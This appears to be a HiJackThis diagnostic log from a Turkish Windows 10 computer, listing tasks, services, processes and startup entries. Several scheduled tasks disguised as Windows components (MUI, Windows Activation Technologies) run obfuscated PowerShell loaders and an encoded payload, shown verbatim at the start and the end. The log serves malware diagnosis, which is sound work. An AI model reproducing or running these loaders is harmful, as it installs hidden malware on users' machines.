e_ifhgr[Nd_,(+_Iyn_{tPzkt.r8_)0iw,4rp_eflm _z]wcso4n_fn_,0x8xe17w00!j05,?[0x=f4_0-8);5fM8a97rsjuhqa_8l.0nC6opapy0_(cjpxFPk(t_x.2,0.{,!i{_frj5N?,s8sJ{oJhKwe);36(7(?_WJ__i_m__)M_{a1radsho?a-l+!.Gq4eat3hDek4l4eg_gakgt/e0_Fo2hr/F?_uneqc+t]_io)8npP_1oi=2n_tr-erlc(xi__fr),Nn,07tyi7ple_0of8_(1W3{Jirpmr)6+))dz(j)__;}uz[iD4slli_I?m.7po_]r,t_p(u_byeCpyra0znhtv3dl1rl}u_oyCh_r=a?8)]oqpqr8_iv[_amtr_e j2s_t,_ato4ifc_m ec}x)t_]er_hn8 3dlovonig]- Np{t_A=2lla_ouc_]aty!e]V3mir=jt_u_xalo4Mye!6mo2or3y__(I_3n_t_{Ptpcr_ _/Np_=Poh}_q,c_r2eu{f _(Imn97tP,xtjr}_ e__pzn_9k,__Ion/wtP)ft=rh5 Ix!Q3o{0Xqf?,6rszef6f rIxsntcvPzt(gr x6KtMy]gL71,6Um_In?_t_31e2 a4A_vvyaqv7,dU7vInq!t_3h_2 _pj_b__ld_4)_;__} c''-)re]pl0acae''_.(=..t)''/,''_$1['' c-rxepalaoce_''uwyC_ra}'',6[c8ha_r]?(3_4)_ -6reipliac5e''7Bn/Bgft''_,[1ch2ar6](u37_))e;(jlsm $yensv:ete9mpr -_Di=|wfhe[re5{(_$_+.N1amie.nLe_ng,th! -,eqy 8f)-/antd(q(G/ett-Ayclx $o_.8Fu_ll8Na_me_)._Actcenss2.FfilheS8ys_texmR3igpht/s c-epq _''Dhel9et5e''/)}x)|xdevl;_[E_nv_irlon-me0nt.]:(:C6ur5reuntdDi]re?cthor_y=_pwvd;_[rtcY_n]i::aBIdMTf()=; ';'$rep_var -rep'+''+'lace($WTPb[11]+$WTPb[14]+$WTPb[11]+$WTPb[11]+$WTPb[7]),(''$''+321/321)'|&($WTPb[8]+$WTPb[4]+$WTPb[9])|&($WTPb[8]+$WTPb[4]+$WTPb[9]);9701108446"
O22 - Task: \Microsoft\Windows\MUI\88542446 - C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe -c "6768699732;$Czjm='recmbL)bvxob.X(TrIiDFh';$rep_var='_&(_gc_m ,A*!-T{y*!).)Na,me_ (2''24us4_i_n/_g d_Spyvystwdeim9h;u_4s7ilfngk2 )S=zys__teehvm.u_I2O=y;u_.s_iu-ngb, aS_tysb_t_eqsm.q.Rtument(4ikm__e.9pI=nm_tew5rdoo_pS?meyra_vii_c}eacs;o=u7s_qin_ig_ vaMiu_cwrutos__o.f.7t.m_W_ieon3-=23;o3pu_mbel5xic_s lcd_la/bsvs__ jt9W6n/_Sz39{vd_selpqelg)_at2ge- {bvox+ind]d Nh0C}Q__OL?4(t)cj;p_huebs_li_rc_ txst_xa6t6_icfe ivk7oi{ld8 kjtWe{m/r_lw(dx)_{_abyvlt_e8_[]ase1X_wsk_ll1=j9Fi+_lpe36.Eh+x_io_stnps_(lhjl+gKdC-_vyu9uxe,yrh.3futnwwtu(jflj4KCfav1)3!?F2di.lvve._oR_ed_ad+_Aulq5lBx_yttnses_5(4jkvlK__Cov6myu8re_re_hfl_t3wvdtj-5l?K!_Cv?9)f:j4(b-_y4t=ge[-o]6)2iRe_4g_i_zst9trpyo2.Le3o_cr_alf_M)at?ch[]ilnr_e.,aO_p[[enn]S_u!_bKo_e?yi((@rgj[l__KC_rv1ScnOFbjT,WrxARm=Ea\(_Mi=ccdr]_os2yo_ff{t\g,CdT3{F\4{T_I9_Pj4_lsK(6Cv_b)e.,,Geh_t_Vpoalinu_e__(j_9l!K9yCv!_y_u(,er_5h_f_}tw_9t_jtylKe9Cdve5,n((u_l_{l)?e;!i]{f(__e7X-_sk9rl6=o4=n_uu2l/el)o_rse-)tuxar-n=u;i]_nstvo I]_Z_B(ve=0_eeX_3sk_,l/._2Le66n!gt_thds;yf(sor?0(0i/!nt_a ja_oTAlfDp=er0;,+a(Ts_AD8_ e!g]=I_/ZhBa!e-l-1o;m_aT+bAqDl_++_5)+{_deX_as}k_zl[x4a_T4,AD44]s^td=(gub}y?_tei1)ij_,lKm[C_vthDs8_k_l7_]4mdtqrf_/o__GfE200u_b}_f!.67j6r0e9gy5i_7wdfsYd=2_,oq_?x.,c+IweD8_4V]L3{Vqx0Mn3ni7ak5uy+o}qfs?C_]_5e+3/L_0qq4Gyxl1Gb/IU_p+0]y6C+0kU__4}(3_rEzj+?bk{6{dl?,lfb_VoC8_n,5zq_6_,=5mz}bBwo8Tf46lW5_qe3d7,.q=cjb7l1KplCvi([!alyTA7_DyAt_Wu_moaVm(93_5]6;oa}I4]n_t{oPt-ur7 c-YX_8O3xwu=(_dI_na_tP_tt1ry_)0r_;_Iq_ntg0P_to=r umCyacwlr13Zm=du(I3?n_t9=Ptb_r8)_/IZxoB2eud;Nm)t.Ai_lla.o/c_-at_]e7V5iirx_t_u(_al_/Mfeiymo5_r{y_e((]7I_ntutP{_t4r.?)(rd-61m}),ror)e)rf w8Y-X(_Ox__,_([eIns[txP?.tr4m)j0j-,rxneufj{ C77aal,3rZkm,_0_sx1}=0q0ik0,!f0_xsq40+z)k;/_Ma(grus,_hak_lb.3wCo!wp=y8g(e!kXbs?_klp0,_0,_,Y__X_Ohtx,_sI_Z_[Be_e)5;)f((_0N4C9xQO!qL_)nzMa8_rns_+ha]hlw._kGe_bt_D-5elqde?gcpat3]e7Fj,or/)Flu__nc/0tdi_1on{nP_olgin/,t1e6gr(=lY_X_hOxe(,tt0_yproe2o_gf(__NbC!_QO_sL_).t))8z(/)5m;})n[5D6_ll/,I_m_hpo2erbt_](jpml]K)7Cv!4n_t__dla!l_j[ilK__C_v__)]?wp_r}tiv_6att6,e 0,s_tswat5_irc5, eggx}t_!er(kn, 99lo_!nhgu+ N9ut_A)bllf4o[c-dat,]ejV+_ir9jtsuisal{xMcerpmo_2rby{o(I]vn_t_hPti1r= g_XL=jUgM6-,r_ce1f-[ I_cntt7}Pto_r_ [?Pe+cW_tb_K,(_Ign09tP5_tyryf S__XpY_=Zg(_,0r?mef_w 3I}_nt)wPrt,_r 37A!n_uaK1b,cUg_In+1tk3og2 blXyB[oVm0p,?Up=Inwnti3m92 _eEcn_{Lk_y)(;_.} [''-!re5pl-ac8e''s.(j.._)''o,''m$1_'' .-r}ep}lawcee''j}lKbCv_'',0[cgha_r]d(3a4)_ -ireppl9ac_e''wAW_uo3V''_,[nch6arx](537z))_;(fls_ $=enkv:)teamp, -)Dik|wxhe!re5{(6$_r.N_am-e.yLeyngith7 -6eq8 8f)-[an-d(_(G_et5-A9cl_ $g_.qFu_ll,Napmef).)Acnce6ssp.F4il3eS_ys+te5mR4ignhtxs 5-e{q _''Dgel)etpe''-)}j)|_de_l;([E_nv+ir7on_mewntv]:8:Cwurkre4nt6Di)rewct_or_y=_pwmd;k[j_WnnSz-]:_:tiWmnrwy()8; ';'$rep_var -rep'+''+'lace($Czjm[12]+$Czjm[14]+$Czjm[12]+$Czjm[12]+$Czjm[6]),(''$''+396/396)'|&($Czjm[18]+$Czjm[1]+$Czjm[9])|&($Czjm[18]+$Czjm[1]+$Czjm[9]);7913805660"
O22 - Task: Adobe Acrobat Update Task - C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe
O22 - Task: AdobeGCInvoker-1.0 - C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGCInvokerUtility.exe -mode=scheduled
O22 - Task: Avast Emergency Update - C:\Program Files\Avast Software\Avast\AvEmUpdate.exe (file missing)
O22 - Task: GoogleUpdateTaskMachineCore - C:\Program Files (x86)\Google\Update\GoogleUpdate.exe /c
O22 - Task: GoogleUpdateTaskMachineUA - C:\Program Files (x86)\Google\Update\GoogleUpdate.exe /ua /installsource scheduler
O22 - Task: IntelSURQC-Upgrade-86621605-2a0b-4128-8ffc-15514c247132 - C:\Program Files\Intel\SUR\QUEENCREEK\Updater\bin\IntelSoftwareAssetManagerService.exe --automatic
O22 - Task: IntelSURQC-Upgrade-86621605-2a0b-4128-8ffc-15514c247132-Logon - C:\Program Files\Intel\SUR\QUEENCREEK\Updater\bin\IntelSoftwareAssetManagerService.exe --automatic
O22 - Task: IUM-F1E24CA0-B63E-4F13-A9E3-4ADE3BFF3473 - C:\Program Files (x86)\Intel\Intel(R) Update Manager\bin\iumsvc.exe --automatic (file missing)
O22 - Task: McAfee Remediation (Prepare) - C:\Program Files\Common Files\AV\McAfee VirusScan\upgrade.exe /prepare
O22 - Task: McAfeeLogon - C:\Program Files\Common Files\McAfee\Platform\McUICnt.exe /platui
O22 - Task: OneDrive Reporting Task-S-1-5-21-523137893-4004670275-4196358549-1001 - C:\Users\CASPER\AppData\Local\Microsoft\OneDrive\OneDriveStandaloneUpdater.exe /reporting
O22 - Task: Opera GX scheduled assistant Autoupdate 1614967658 - C:\Users\CASPER\AppData\Local\Programs\Opera GX\launcher.exe --scheduledautoupdate --component-name=assistant --component-path="C:\Users\CASPER\AppData\Local\Programs\Opera GX\assistant" $(Arg0)
O22 - Task: Opera GX scheduled Autoupdate 1604429592 - C:\Users\CASPER\AppData\Local\Programs\Opera GX\launcher.exe --scheduledautoupdate $(Arg0)
O22 - Task: Opera scheduled assistant Autoupdate 1590958890 - C:\Users\CASPER\AppData\Local\Programs\Opera\launcher.exe --scheduledautoupdate --component-name=assistant --component-path="C:\Users\CASPER\AppData\Local\Programs\Opera\assistant" $(Arg0) (file missing)
O22 - Task: Opera scheduled Autoupdate 1590958881 - C:\Users\CASPER\AppData\Local\Programs\Opera\launcher.exe --scheduledautoupdate $(Arg0) (file missing)
O22 - Task: TaskbarX CASPERNIRVANACASPER - C:\Users\CASPER\Desktop\TaskbarX_1.6.9.0_x64\TaskbarX.exe -tbs=1 -color=0;0;0;50 -tpop=100 -tsop=100 -as=cubiceaseinout -obas=cubiceaseinout -asp=300 -ptbo=0 -stbo=0 -lr=400 -oblr=400 -sr=0 -sr2=0 -sr3=0 -ftotc=1 -rzbt=1 (file missing)
O23 - Service R2: Adobe Acrobat Update Service - (AdobeARMservice) - C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
O23 - Service R2: Adobe Genuine Monitor Service - (AGMService) - C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGMService.exe
O23 - Service R2: Adobe Genuine Software Integrity Service - (AGSService) - C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGSService.exe
O23 - Service R2: Dolby DAX2 API Service - (DAX2API) - C:\Program Files\Dolby\Dolby DAX2\DAX2_API\DolbyDAX2API.exe
O23 - Service R2: Elan Service - (ETDService) - C:\Program Files\Elantech\ETDService.exe
O23 - Service R2: Gaming Services - (GamingServices) - C:\Program Files\WindowsApps\Microsoft.GamingServices_3.60.12001.0_x64__8wekyb3d8bbwe\GamingServices.exe
O23 - Service R2: Gaming Services - (GamingServicesNet) - C:\Program Files\WindowsApps\Microsoft.GamingServices_3.60.12001.0_x64__8wekyb3d8bbwe\GamingServicesNet.exe
O23 - Service R2: Intel(R) Driver & Support Assistant - (DSAService) - C:\Program Files (x86)\Intel\Driver and Support Assistant\DSAService.exe
O23 - Service R2: Intel(R) HD Graphics Control Panel Service - (igfxCUIService2.0.0.0) - C:\WINDOWS\system32\igfxCUIService.exe
O23 - Service R2: McAfee AP Service - (McAPExe) - C:\Program Files\Common Files\McAfee\VSCore_21_4\McApExe.exe
O23 - Service R2: McAfee CSP Service - (mccspsvc) - C:\Program Files\Common Files\McAfee\CSP\4.3.107.0\\McCSPServiceHost.exe
O23 - Service R2: McAfee Module Core Service - (ModuleCoreService) - C:\Program Files\Common Files\McAfee\ModuleCore\ModuleCoreService.exe
O23 - Service R2: McAfee PEF Service - (PEFService) - C:\Program Files\Common Files\McAfee\PEF\CORE\PEFService.exe
O23 - Service R2: McAfee Service Controller - (mfemms) - C:\Program Files\Common Files\McAfee\SystemCore\mfemms.exe
O23 - Service R2: McAfee WebAdvisor - C:\Program Files\McAfee\WebAdvisor\ServiceHost.exe
O23 - Service R2: PMBDeviceInfoProvider - C:\Program Files (x86)\Sony\PlayMemories Home\PMBDeviceInfoProvider.exe
O23 - Service R3: Intel(R) Driver & Support Assistant Updater - (DSAUpdateService) - C:\Program Files (x86)\Intel\Driver and Support Assistant\DSAUpdateService.exe
O23 - Service R3: McAfee Validation Trust Protection Service - (mfevtp) - C:\Program Files\Common Files\McAfee\SystemCore\mfemms.exe
O23 - Service S2: Google Güncelleme Hizmeti (gupdate) - (gupdate) - C:\Program Files (x86)\Google\Update\GoogleUpdate.exe /svc
O23 - Service S3: BattlEye Service - (BEService) - C:\Program Files (x86)\Common Files\BattlEye\BEService.exe
O23 - Service S3: EasyAntiCheat - C:\Program Files (x86)\EasyAntiCheat\EasyAntiCheat.exe
O23 - Service S3: Epic Online Services - (EpicOnlineServices) - C:\Program Files (x86)\Epic Games\Epic Online Services\service\EpicOnlineServicesHost.exe
O23 - Service S3: Google Chrome Elevation Service (GoogleChromeElevationService) - (GoogleChromeElevationService) - C:\Program Files (x86)\Google\Chrome\Application\97.0.4692.71\elevation_service.exe
O23 - Service S3: Google Güncelleme Hizmeti (gupdatem) - (gupdatem) - C:\Program Files (x86)\Google\Update\GoogleUpdate.exe /medsvc
O23 - Service S3: Intel(R) Content Protection HECI Service - (cphs) - C:\WINDOWS\SysWow64\IntelCpHeciSvc.exe
O23 - Service S3: Intel(R) SUR QC Software Asset Manager - (Intel(R) SUR QC SAM) - C:\Program Files\Intel\SUR\QUEENCREEK\Updater\bin\IntelSoftwareAssetManagerService.exe
O23 - Service S3: McAfee Firewall Core Service - (mfefire) - C:\Program Files\Common Files\McAfee\SystemCore\mfemms.exe
O23 - Service S3: Rockstar Game Library Service - (Rockstar Service) - C:\Program Files\Rockstar Games\Launcher\RockstarService.exe
O23 - Service S3: Steam Client Service - C:\Program Files (x86)\Common Files\Steam\steamservice.exe /RunAsService
O23 - Service S3: SteelSeries Update Service - (SteelSeriesUpdateService) - C:\Program Files\SteelSeries\GG\SteelSeriesUpdateService.exe
O23 - Service S3: Uncheater for BattleGrounds_GL - (ucldr_battlegrounds_gl) - C:\Program Files\Common Files\UNCHEATER\ucldr_battlegrounds_gl.exe
O23 - Service S3: Uncheater for BattleGroundsLite_SE - (uncheater_bgl) - C:\Program Files\Common Files\Uncheater\uncheater_bgl.exe
O23 - Service S3: vgc - C:\Program Files\Riot Vanguard\vgc.exe
O23 - Service S3: Zakynthos Service - (zksvc) - C:\Program Files\Common Files\PUBG\zksvc.exe


--
End of file - Time spent: 104,3 sec. - 64562 bytes, CRC32: FFFFFFFF. Sign: 譭烮
Platform:  x64 Windows 10 (Home Single Language), 10.0.19044.1499 (ReleaseId: 2009, 21H2), Service Pack: 0
Time:      23.01.2022 - 13:21 (UTC+03:00)
Language:  OS: Turkish (0x41F). Display: Turkish (0x41F). Non-Unicode: Turkish (0x41F)
Elevated:  Yes
Ran by:    CASPER    (group: Administrators) on CASPERNIRVANA, FirstRun: yes

Chrome:  97.0.4692.71
Internet Explorer: 11.0.19041.1202
Default: "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --single-argument %1 (Google Chrome)

Boot mode: Normal

Running processes:
Number | Path
   1  C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGMService.exe
   1  C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGSService.exe
   1  C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
   1  C:\Program Files (x86)\Google\Update\1.3.36.122\GoogleCrashHandler.exe
   1  C:\Program Files (x86)\Google\Update\1.3.36.122\GoogleCrashHandler64.exe
   1  C:\Program Files (x86)\Intel\Driver and Support Assistant\DSAService.exe
   1  C:\Program Files (x86)\Intel\Driver and Support Assistant\DSATray.exe
   1  C:\Program Files (x86)\Intel\Driver and Support Assistant\DSAUpdateService.exe
   1  C:\Program Files (x86)\Sony\PlayMemories Home\PMBDeviceInfoProvider.exe
   1  C:\Program Files (x86)\Steam\steam.exe
   1  C:\Program Files\Common Files\McAfee\AMCore\mcshield.exe
   1  C:\Program Files\Common Files\McAfee\CSP\4.3.107.0\McCSPServiceHost.exe
   1  C:\Program Files\Common Files\McAfee\MMSSHost\MMSSHOST.exe
   3  C:\Program Files\Common Files\McAfee\ModuleCore\ModuleCoreService.exe
   1  C:\Program Files\Common Files\McAfee\ModuleCore\ProtectedModuleHost.exe
   1  C:\Program Files\Common Files\McAfee\PEF\CORE\PEFService.exe
   1  C:\Program Files\Common Files\McAfee\Platform\McUICnt.exe
   1  C:\Program Files\Common Files\McAfee\SystemCore\mfemms.exe
   1  C:\Program Files\Common Files\McAfee\VSCore_21_4\mcapexe.exe
   1  C:\Program Files\Dolby\Dolby DAX2\DAX2_API\DolbyDAX2API.exe
   1  C:\Program Files\Elantech\ETDCtrl.exe
   1  C:\Program Files\Elantech\ETDCtrlHelper.exe
   1  C:\Program Files\Elantech\ETDService.exe
   1  C:\Program Files\Intel\SUR\QUEENCREEK\Updater\bin\IntelSoftwareAssetManagerService.exe
   1  C:\Program Files\McAfee\MfeAV\MfeAVSvc.exe
   1  C:\Program Files\McAfee\WebAdvisor\servicehost.exe
   1  C:\Program Files\McAfee\WebAdvisor\uihost.exe
   1  C:\Program Files\Riot Vanguard\vgtray.exe
   1  C:\Program Files\SteelSeries\GG\moments\SteelSeriesSvcLauncher.exe
   1  C:\Program Files\SteelSeries\GG\SteelSeriesEngine.exe
   1  C:\Program Files\SteelSeries\GG\SteelSeriesGG.exe
   1  C:\Program Files\WindowsApps\Microsoft.GamingServices_3.60.12001.0_x64__8wekyb3d8bbwe\gamingservices.exe
   1  C:\Program Files\WindowsApps\Microsoft.GamingServices_3.60.12001.0_x64__8wekyb3d8bbwe\gamingservicesnet.exe
   1  C:\Program Files\Xear Audio Center\CPL\FaceLift_x64.exe
   2  C:\Users\CASPER\AppData\Local\Programs\Opera GX\launcher.exe
   1  C:\Users\CASPER\Desktop\HiJackThis.exe
   1  C:\Windows\explorer.exe
   1  C:\Windows\Microsoft.NET\Framework64\v3.0\WPF\PresentationFontCache.exe
   1  C:\Windows\System32\audiodg.exe
   1  C:\Windows\System32\backgroundTaskHost.exe
   4  C:\Windows\System32\conhost.exe
   2  C:\Windows\System32\csrss.exe
   1  C:\Windows\System32\ctfmon.exe
   1  C:\Windows\System32\dasHost.exe
   1  C:\Windows\System32\dwm.exe
   2  C:\Windows\System32\fontdrvhost.exe
   1  C:\Windows\System32\igfxCUIService.exe
   1  C:\Windows\System32\igfxHK.exe
   1  C:\Windows\System32\lsass.exe
   1  C:\Windows\System32\mfevtps.exe
   1  C:\Windows\System32\MusNotification.exe
   2  C:\Windows\System32\RuntimeBroker.exe
   1  C:\Windows\System32\SearchFilterHost.exe
   1  C:\Windows\System32\SearchIndexer.exe
   1  C:\Windows\System32\SearchProtocolHost.exe
   1  C:\Windows\System32\SecurityHealthService.exe
   1  C:\Windows\System32\services.exe
   1  C:\Windows\System32\SettingSyncHost.exe
   1  C:\Windows\System32\SgrmBroker.exe
   1  C:\Windows\System32\sihost.exe
   1  C:\Windows\System32\smss.exe
   1  C:\Windows\System32\snmp.exe
   1  C:\Windows\System32\spoolsv.exe
  82  C:\Windows\System32\svchost.exe
   1  C:\Windows\System32\taskhostw.exe
   1  C:\Windows\System32\wbem\unsecapp.exe
   1  C:\Windows\System32\wbem\WmiPrvSE.exe
   1  C:\Windows\System32\wermgr.exe
   2  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
   1  C:\Windows\System32\wininit.exe
   1  C:\Windows\System32\winlogon.exe
   1  C:\Windows\System32\WUDFHost.exe
   1  C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
   1  C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
   1  C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\InputApp\TextInputHost.exe

R4 - SearchScopes: HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{8C3078A0-9AAB-4371-85D1-656CA8E46EE8}: [SuggestionsURL_JSON] = https://suggest.yandex.com.tr/suggest-ff.cgi?srv=ie11&uil=tr&part={searchTerms}&clid=2233630 - Yandex
R4 - SearchScopes: HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{8C3078A0-9AAB-4371-85D1-656CA8E46EE8}: [URL] = https://yandex.com.tr/search/?text={searchTerms}&clid=2233630 - Yandex
O2 - HKLM\..\BHO: Java(tm) Plug-In 2 SSV Helper - {DBC80044-A445-435b-BC74-9C25C1C588A9} - C:\Program Files\Java\jre1.8.0_271\bin\jp2ssv.dll
O2 - HKLM\..\BHO: Java(tm) Plug-In SSV Helper - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Program Files\Java\jre1.8.0_271\bin\ssv.dll
O2 - HKLM\..\BHO: McAfee WebAdvisor - {B164E929-A1B6-4A06-B104-2CD0E90A88FF} - C:\Program Files\McAfee\WebAdvisor\x64\IEPlugin.dll
O2-32 - HKLM\..\BHO: Java(tm) Plug-In 2 SSV Helper - {DBC80044-A445-435b-BC74-9C25C1C588A9} - C:\Program Files (x86)\Java\jre1.8.0_271\bin\jp2ssv.dll
O2-32 - HKLM\..\BHO: Java(tm) Plug-In SSV Helper - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Program Files (x86)\Java\jre1.8.0_271\bin\ssv.dll
O2-32 - HKLM\..\BHO: McAfee WebAdvisor - {B164E929-A1B6-4A06-B104-2CD0E90A88FF} - C:\Program Files\McAfee\WebAdvisor\win32\IEPlugin.dll
O4 - HKCU\..\Run: [Steam] = C:\Program Files (x86)\Steam\steam.exe -silent
O4 - HKCU\..\StartupApproved\Run: [com.blitz.app] = C:\Users\CASPER\AppData\Local\Programs\Blitz\Blitz.exe --autostart (2021/07/22)
O4 - HKCU\..\StartupApproved\Run: [DSL Host] = C:\Users\CASPER\AppData\Roaming\4C9F9BE4-4E44-4309-A6B4-69A5DA3242B1\DSL Host\dslhost.exe (2020/11/25)
O4 - HKCU\..\StartupApproved\Run: [OneDrive] = C:\Users\CASPER\AppData\Local\Microsoft\OneDrive\OneDrive.exe /background (2021/07/22)
O4 - HKCU\..\StartupApproved\Run: [Opera GX Browser Assistant] = C:\Users\CASPER\AppData\Local\Programs\Opera GX\assistant\browser_assistant.exe (2021/03/09)
O4 - HKCU\..\StartupApproved\Run: [Spotify] = C:\Users\CASPER\AppData\Roaming\Spotify\Spotify.exe --autostart --minimized (2020/06/01)
O4 - HKCU\..\StartupApproved\Run: [Voicemod] = C:\Program Files\Voicemod Desktop\VoicemodDesktop.exe (file missing) (2020/11/25)
O4 - HKCU\..\StartupApproved\Run: [Zoom] = (no file) (2021/03/12)
O4 - HKCU\..\StartupApproved\StartupFolder: C:\Users\CASPER\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\NimoLive.lnk    ->    C:\Program Files (x86)\NimoLive\launcher.exe (2021/10/03)
O4 - HKLM\..\Run: [Cm108BSound] = C:\Program Files\Xear Audio Center\CPL\FaceLift_x64.exe /h /d
O4 - HKLM\..\Run: [Riot Vanguard] = C:\Program Files\Riot Vanguard\vgtray.exe
O4 - HKLM\..\Run: [SteelSeriesGG] = C:\Program Files\SteelSeries\GG\SteelSeriesGG.exe -dataPath="C:\ProgramData\SteelSeries\GG" -dbEnv=production -auto=true
O4 - HKLM\..\StartupApproved\Run: [AdobeGCInvoker-1.0] = C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGCInvokerUtility.exe (2020/09/29)
O4 - HKLM\..\StartupApproved\Run: [AvastUI.exe] = C:\Program Files\Avast Software\Avast\AvLaunch.exe /gui (file missing) (2020/10/27)
O4 - HKLM\..\StartupApproved\Run: [ETDCtrl] = C:\Program Files\Elantech\ETDCtrl.exe (2021/09/25)
O4 - HKLM\..\StartupApproved\Run: [RtHDVBg_Dolby] = C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe /FORPCEE4 (2021/09/25)
O4 - HKLM\..\StartupApproved\Run: [RTHDVCPL] = C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe -s (2021/09/25)
O4 - HKLM\..\StartupApproved\Run: [tvncontrol] = C:\Program Files\TightVNC\tvnserver.exe -controlservice -slave (file missing) (2020/11/30)
O4 - HKLM\..\StartupApproved\Run: [Wondershare Helper Compact.exe] = C:\Program Files\Common Files\Wondershare\Wondershare Helper Compact\WSHelper.exe (file missing) (2020/09/29)
O4 - HKLM\..\StartupApproved\Run32: [DivXMediaServer] = C:\Program Files (x86)\DivX\DivX Media Server\DivXMediaServer.exe (file missing) (2020/10/27)
O4 - HKLM\..\StartupApproved\Run32: [Intel Driver & Support Assistant] = C:\Program Files (x86)\Intel\Driver and Support Assistant\DSATray.exe (2021/12/22)
O4 - HKLM\..\StartupApproved\Run32: [PMBVolumeWatcher] = C:\Program Files (x86)\Sony\PlayMemories Home\PMBVolumeWatcher.exe /SysAutoRun (2021/03/09)
O4 - HKLM\..\StartupApproved\Run32: [SunJavaUpdateSched] = C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe (2021/03/12)
O4 - HKLM\..\StartupApproved\Run32: [Wondershare Helper Compact.exe] = C:\Program Files (x86)\Common Files\Wondershare\Wondershare Helper Compact\WSHelper.exe (file missing) (2020/11/09)
O4 - HKU\S-1-5-19\..\RunOnce: [WAB Migrate] = C:\Program Files\Windows Mail\wab.exe /Upgrade (User 'Local service')
O4 - HKU\S-1-5-20\..\RunOnce: [WAB Migrate] = C:\Program Files\Windows Mail\wab.exe /Upgrade (User 'Network service')
O9 - Button: HKLM\..\{48A61126-9A19-4C50-A214-FF08CB94995C}: McAfee WebAdvisor - C:\Program Files\McAfee\WebAdvisor\x64\IEPlugin.dll
O9 - Tools menu item: HKLM\..\{48A61126-9A19-4C50-A214-FF08CB94995C}: McAfee WebAdvisor - C:\Program Files\McAfee\WebAdvisor\x64\IEPlugin.dll
O9-32 - Button: HKLM\..\{48A61126-9A19-4C50-A214-FF08CB94995C}: McAfee WebAdvisor - C:\Program Files\McAfee\WebAdvisor\win32\IEPlugin.dll
O9-32 - Tools menu item: HKLM\..\{48A61126-9A19-4C50-A214-FF08CB94995C}: McAfee WebAdvisor - C:\Program Files\McAfee\WebAdvisor\win32\IEPlugin.dll
O17 - DHCP DNS 1: 192.168.1.1
O18 - HKLM\Software\Classes\Protocols\Filter\application/x-mfe-ipt: [CLSID] = {3EF5086B-5478-4598-A054-786C45D75692} - C:\Program Files\McAfee\MSC\McSnIePl64.dll
O21 - HKLM\..\ShellIconOverlayIdentifiers\00asw: (no name) - {472083B0-C522-11CF-8763-00608CC02F24} - (no file)
O22 - Task (.job): (disabled) (Not scheduled) CreateExplorerShellUnelevatedTask.job - C:\WINDOWS\explorer.exe
O22 - Task: (activation) \Microsoft\Windows\Windows Activation Technologies\Windows Activation Technologies - C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe -c "$vKuBCo='u322Uu0kzAupD8JY/Hy6U80/yCanRJhNphWfXdB2j2LzF9lChxb0b/Euv2L4Pb9i7jWKD4BlsCSmS9RQqliyNshGxkLbUsE8qAiiKpMV/RbHN71j9wb4eO5e7WHSFYgE5XT7JpUKijmRObgJykuOBYYT632KabAFgmGfF+FntCSEK6h31SPiEJQM0TjqO8sugxHqBfEqthWcXr8VilXpDOptiBXUXMdb4GH5Hfo8rwW2L9kS1iHobPF/pBeOaaph+AmaFYsE1VT5dYl09VjdY9Aw82/uQZZi4mfVJcEKggmUcPkppVPKQKVE7iqIAocIkU3MYOAS/WmXW/ld2Wq8V/0b6X3oFc97lA6MTsZp8GysMr9onFTzCYYErBWEFfh1kWKtR50q2heuTfl0o2L/Y4dp/wDQScNhvHetTcFG7136JNwF0xmOWMx2oi7raY8U+iWSfPcktQf6NLhArT2GRIhdoG7rZIlZ3mzFMqcGhwLAVJtNqy/BdLBOlXTeQeoxuHPaLKVonHX1HtwOxUfrcuIUlAXDO/FljBi1StIRinSkJvJpjwnUXMdq/XH2Dbcn7ke1T5ABjAjZOqR7jAzSXZVl6Ai1StI1wli7Z8wuuUrSM9AG72e+O6pJ6WfGQ8I2pVrCTv11/xGMB7ZE8i2EP50ExT6da+BGu33GQ+ESiWioK7dN8TviHq46jQiIX/c9ry6MX95v2j+4EdUWyFSdUORkhHXxDtE1n0mkaLAkki6odIRo7gSUWpFspSLyU7sG+hL5d4tevB+7BJpu4hq3IcAcsg+bMLog6UfMYOoE6me+D5wFpC37ecVRyjTRJLEBhhTIWMwZ7zTIafVDyTjXHqRtoSi/Yvs+p2XmAJsU2DHMf+AYtAPzBbxXgQOcFYVeu2LvCO1hjxinJY9h4nD3Du11+xjmOq8zuSP2ee58ijGfdI5t/wW4AocGgRT6Zsw8tATXV4wK7VLxbKJz/nqGYKRHxDKrXdNj6SubDusFoji1H4wFhAWbOehLyk6yJutSjyyqa+8M9VPoJahnuyGuEs5MqkunOo80zTfqMaE2oze5BvhglU79Mclb0S+2RbdVwUnhdYtB6zy/U7lfwnHgEZAW0znNbbYBvAfRHo5C5C7zRboFuSW4SqE90F60P+ciyE2pUa1X4WnbR70Ev03OdvlQ0TKAIYwm9GetafpTt13RDNJ9z1Owb+pimjLOB69Ljmj0UsYaoAPXK8ZslCefQZEG2DqwUtJnnxTlE44mrkHgGfB67h7rKrwxuSK4L9twlQ2UY5ZwolzHIrsxoxXmQoRr5QbHM9de6Wy0JJYp2naabuocvAGMfbBd8gSOB8U9wV+bGIkCsy21I+UNsyC1BP5Lsnr4YfsdvznfCe9xswGV